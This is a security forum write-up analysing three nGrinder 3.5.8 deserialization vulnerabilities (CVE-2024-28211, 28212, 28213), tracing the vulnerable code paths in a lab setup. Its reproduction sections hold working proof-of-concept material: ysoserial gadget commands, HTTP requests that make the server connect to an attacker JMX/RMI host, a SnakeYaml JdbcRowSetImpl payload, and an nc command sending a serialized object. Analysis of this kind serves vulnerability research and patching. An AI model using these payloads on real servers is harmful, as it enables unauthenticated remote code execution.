奇安信攻防社区-ngrinder漏洞分析（CVE-2024-28211|28212|28213）

ngrinder漏洞分析（CVE-2024-28211|28212|28213）

nGrinder是一个压力测试平台，能够同时执行脚本创建、测试执行、监控和结果报告生成器。 nGrinder 3.5.9之前版本存在安全漏洞，漏洞源于允许接受未经身份验证用户的序列化Java对象，可能允许远程攻击者通过不安全的Java对象反序列化执行任意代码。

漏洞简介
----

环境搭建
----

通过github下载程序war包<https://github.com/naver/ngrinder/releases/tag/ngrinder-3.5.8-20221230>

接着使用tomcat进行部署，登录tomcat管理后台，将war上传上去部署即可

访问<http://localhost:8006/>出现登录界面说明部署成功，默认账号密码为admin/admin

![image-20240722202017487.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-6fd3b5a1c10c5596a574f79faad0e874ff69fb4d.png)

接着在IDEA中开启调试，就可以调试项目了，具体可以参考下面这篇文章

<https://developer.aliyun.com/article/1129600>

CVE-2024-28211
--------------

### 分析过程

该系统的鉴权是通过@PreAuthorize来实现的，@PreAuthorize是Spring Security提供的注解之一，用于在方法执行之前进行权限验证

在org.ngrinder.agent.controller.MonitorManagerApiController控制器下存在一个getRealTimeMonitorData方法，该方法是无需鉴权的，接收一个参数ip，接着调用AopUtils.proxy(this).getAsyncSystemInfo()，port默认为13243

![image-20240722120429518.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-897e65b08b50fcb9c8b373b569178d2b96f720e0.png)

跟进到MonitorInfoStore#getSystemInfo()，通过该方法会实例化一个MonitorClientService对象，初始化对象之后，就会调用到该对象里的init方法

![image-20240722120749697.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-31daa26c97cc492564b3b7f580cef4f4f2ef5752.png)

在init()，实例化MBeanClinet对象，该对象中包含一个jmxurl属性，接着就会调用mBeanClient.connect()连接到jmxurl。

可以控制ip的值，创建一个恶意的jmx服务端，当程序连接到jmxurl时就会执行恶意代码，而且在环境中存在commons-collections依赖，可以利用cc链实现命令执行

![image-20240722145003930.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-16593e9d17973a56aaf44e3fd9a45ab174c8a6e0.png)

![image-20240722121209859.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-783866c6c0291674c2c97783066e1bff2e7b0af5.png)

最终会执行到MBeanClient#connectionTimeout()里，通过JMXConnectorFactory.connect()连接到jmx服务端

![image-20240722203430327.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-33611beda3cecaf179562098da1c5701daeb9457.png)

### 漏洞复现

利用ysoserial启动一个jmx服务端

![image-20240722203645547.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-1f55eb1d9b84850a3d352498f3f2067e8e870d10.png)

```java
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 13243 CommonsCollections6 "calc"
```

接着请求漏洞接口就可以看到弹出计算器

```java
GET /ngrinder-controller-3.5.8/monitor/api/state?ip=192.168.85.129 HTTP/1.1
Host: localhost:8006
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
```

CVE-2024-28212
--------------

### 分析过程

在FileEntryApiController#validateGithubConfig()下还存在一个SnakeYaml的反序列化漏洞，在该接口下调用了validate()

![image-20240722155441699.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-08c699a1d08fb1eb32160e82ffff173b977b158a.png)  
跟进到GithubFileEntryService#validate()方法下，for循环中调用了getAllGithubConfig()，该方法下的yaml.loadAll()就存在SnakeYaml反序列化漏洞

在SnakeYaml反序列化时，可以通过!!指定反序列化的类，它和fastjson反序列化时类似，都会去调用指定类下的setter方法

![image-20240722160828760.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-219f7fc0767f8e6e6d984649ca108f3206ecd28f.png)

![image-20240722160846618.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-f6da0fbb7eb77ed815bb7d992736fede343ce45d.png)

### 漏洞复现

```java
POST /ngrinder-controller-3.5.8/script/api/github/validate HTTP/1.1
Host: localhost:8006
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

{
"content":  "!!com.sun.rowset.JdbcRowSetImpl\n  dataSourceName: rmi://192.168.85.129:13243/jmxrmi\n  autoCommit: true\n"
}
```

CVE-2024-28213
--------------

### 分析过程

在启动时，ngrinder会默认在16001端口上运行一个监听器，该监听器可以接收一个序列化对象，当系统接收到该对象时会执行反序列化

在net.grinder.communication.Connector类下可以看到该类下存在一个read()，会调用objectInputStream.readObject()执行反序列化

![image-20240722165443475.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-a52a0ed93c7cf0f7b95786f233292481c3f2eb76.png)

在Acceptor#interruptibleRun()方法下可以看到，程序会启动一个socket服务，持续监听16001端口，当接收到内容时就会调用到Acceptor.this.discriminateConnection()，而在该方法下最终又会调用到Connector.read()执行反序列化

![image-20240722180157752.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-3cf24aec8e984e05d1f4b01d87b031df519bc7f8.png)

![image-20240722174713133.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-b6621d013243b50d39b4cb8eb237046e43ba8e20.png)

从docker-compose.yml文件里可以看出监听16001端口

![image-20240722205427621.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-8e0a3f441b5317a8da5dc75270c14ec24e055171.png)

### 漏洞复现

通过ysoserial生成反序列化文件

```java
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections7 "calc" > calc.bin
```

通过nc将文件发送到服务端的16001端口，程序会弹出计算器

```java
nc 192.168.85.1 16001 < calc.bin
```

![image-20240722180732705.png](https://shs3.b.qianxin.com/attack_forum/2024/07/attach-76bfada1529e46e1a072b529208b774dd9386acd.png)

发表于 2024-07-29 09:40:22
阅读 ( 4183 )
分类：Web应用

ngrinder漏洞分析 （CVE-2024-28211|28212|28213）

0 条评论

ngrinder漏洞分析（CVE-2024-28211|28212|28213）